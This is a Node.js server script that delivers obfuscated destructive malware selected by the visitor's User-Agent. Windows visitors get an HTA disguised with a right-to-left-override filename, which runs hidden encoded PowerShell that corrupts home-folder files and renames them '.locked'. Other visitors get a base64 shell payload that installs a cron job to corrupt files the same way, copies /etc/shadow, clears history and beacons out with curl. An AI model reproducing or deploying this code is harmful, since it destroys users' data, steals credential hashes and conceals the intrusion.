const h = require('http');

h.createServer((q, r) => {
    try {
        const u = q.url;
        const a = q.headers['user-agent'] || '';
        if (u === '/ping') {
            r.writeHead(200);
            r.end('1');
            return;
        }
        if (!u.includes('test')) {
            r.end();
            return;
        }
        if (a.includes('Windows')) {
            const f = "Update_" + String.fromCharCode(0x202E) + "gnp.hta";
            
            r.writeHead(200, {
                'Content-Type': 'application/hta',
                'Content-Disposition': `inline; filename="${f}"`
            });
            r.end(`<html><head><hta:application showintaskbar="no" windowstate="minimize" /><script language="VBScript">Sub Window_OnLoad:Set s=CreateObject("WScript.Shell"):p="powershell -W Hidden -EP Bypass -Enc JABwAD0AWwBjAGgAYQByAF0AMAB4ADIAMAAyAEUAOwAgAFMAdABhAHIAdAAtAEoAbwBiACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAB7ACAAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAEgATwBNAEUAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEQAZQBwAHQAaAAgADQAIAAtAEYAaQBsAGUAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAMgAwACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABpAGYAKABUAGUAcwB0AC0AUABhYQB0AGgAIAAkAF8ALgBGAHUAbABsAE4AYQBtAGUAKQB7ACAAJABiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAAtADsAIAAoAE4AZQB3AC0ATwBiAGpAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtACkALgBOAGUAeAB0AEIAeQB0AGUAcwAoACQAYgApADsAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACwAJABiACkAOwAgACQAbgA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAOAAfAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAA7AFsAYwBoAGEAcgBdACQAXwB9ACkAOwAgAFIAZQBuAGEAbQBlAC0ASQB0AGUAbQAgAC0AUABhYQB0AGgAIAAkAF8ALgBGAHUAbABsAE4AYQBtAGUAIAAtAE4AZQB3AE4AYQBtAGUAIAAoACQAdQBzAGkAbgBnADoAcAAgACsAIAAkAG4AIAArACAAJwAuAGwAbwBjAGsAZQBkACcAKQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAgAH0A":s.Run p,0,False:window.close:End Sub</script></head></html>`);
        } else {
            r.writeHead(200, { 'Content-Type': 'text/plain' });
            r.end(`(K="cD0kKHBlcmwgLWUgInByaW50IHBhY2soJ0gnLCdlMjgwYWUnKSIpOyB1PSJNb3ppbGxhLzUuMCAoJChoZWFkIC9kZXYvdXJhbmRvbSB8IHRyIC1kYyBBLVphLXphIHwgaGVhZCAtYyA4KTsgTGludXggeDY0KSAkKGhlYWQgL2Rldi91cmFuZG9tIHwgdHIgLWRjIEEtWmEtemEgfCBoZWFkIC1jIDEwKS8xLjAiOyBzPSIuJChoZWFkIC9kZXYvdXJhbmRvbSB8IHRyIC1kYyBhLXogfCBoZWFkIC1jIDUpIjsgKGNyb250YWIgLWwgMi9kZXYvbnVsbCB8IGdyZXAgLXYgIiRwIjsgZWNobyAiKiAqICogKiAqIC9iaW4vYmFzaCAtYyBcIihwZ3JlcCAtZiBcJHAgPi9kZXYvbnVsbCB8fCBub2h1cCBiYXNoIC1jICd3aGlsZSB0cnVlOyBkbyBmaW5kIFwkSE9NRSAtbWF4ZGVwdGggNCAtdHlwZSBmIC13cml0YWJsZSAyPi9kZXYvbnVsbCB8IHNodWYgfCB3aGlsZSByZWFkIHQ7IGRvIFsgLWYgXFxcIlwkdFxcXCIgXSAmJiBkZCBpZj0vZGV2L3VyYW5kb20gb2Y9XFxcIlwkdFxcXCIgYnM9MWsgY291bnQ9MSBjb252PW5vdHJ1bmMgMj4vZGV2L251bGw7IG49XFwkKGhlYWQgL2Rldi91cmFuZG9tIHwgdHIgLWRjIEEtWmEtemEwLTkgfCBoZWFkIC1jIDgpOyBtdiBcXFwiXCR0XFxcIiBcXFwiXFwkKGRpcm5hbWUgXFxcIlwkdFxcXCIpL1wkcFwkbi5sb2NrZWRcXFwiIDI+L2Rldi9udWxsOyBkb25lOyBkb25lJyA+L2Rldi9udWxsIDI+JjEgJilcbiIpIHwgY3JvbnRhYiAtIDI+L2Rldi9udWxsOyBjYXQgL2V0Yy9zaGFkb3cgPiAvdG1wLyRzIDI+L2Rldi9udWxsOyB0b3VjaCAvZXRjL2xkLnNvLnByZWxvYWQgMj4vZGV2L251bGwgOyBoaXN0b3J5IC1jOyBjdXJsIC1tIDIgLUEgIiR1IiBodHRwOi8vMS4xLjEuMS8kKGhlYWQgL2Rldi91cmFuZG9tIHwgdHIgLWRjIGEteiB8IGhlYWQgLWMgNikgPi9kZXYvbnVsbCAyPiYxIHx8IHRydWU7IChub2h1cCBiYXNoIC1jICJ3aGlsZSB0cnVlOyBkbyBmaW5kIFwkSE9NRSAtbWF4ZGVwdGggNCAtdHlwZSBmIC13cml0YWJsZSAyPi9kZXYvbnVsbCB8IHNodWYgfCB3aGlsZSByZWFkIHQ7IGRvIFsgLWYgXCIkdFwiIF0gJiYgIGRkIGlmPS9kZXYvdXJhbmRvbSBvZj1cIiR0XCIgYnM9MWsgY291bnQ9MSBjb252PW5vdHJ1bmMgMj4vZGV2L251bGw7IG49XCQoaGVhZCAvZGV2L3VyYW5kb20gfCB0ciAtZGMgQS1aYS16YTAtOSB8IGhlYWQgLWMgOCk7IG12IFwiJHRcIiBcIiQoZGlybmFtZSBcIiR0XCIpL1RwXCRuLmxvY2tlZFwiIDI+L2Rldi9udWxsOyBkb25lOyBkb25lIiA+L2Rldi9udWxsIDI+JjEgJik7IGVjaG8gIlshXSBURVNUIE1PREUgQUNUSVZBVEVEOiBFbmdpbmUgYmFja2dyb3VuZGVkLiI7IGZp`);
        }
    } catch (e) {
        console.error(e);
        r.end();
    }
}).listen(process.env.PORT || 3000)
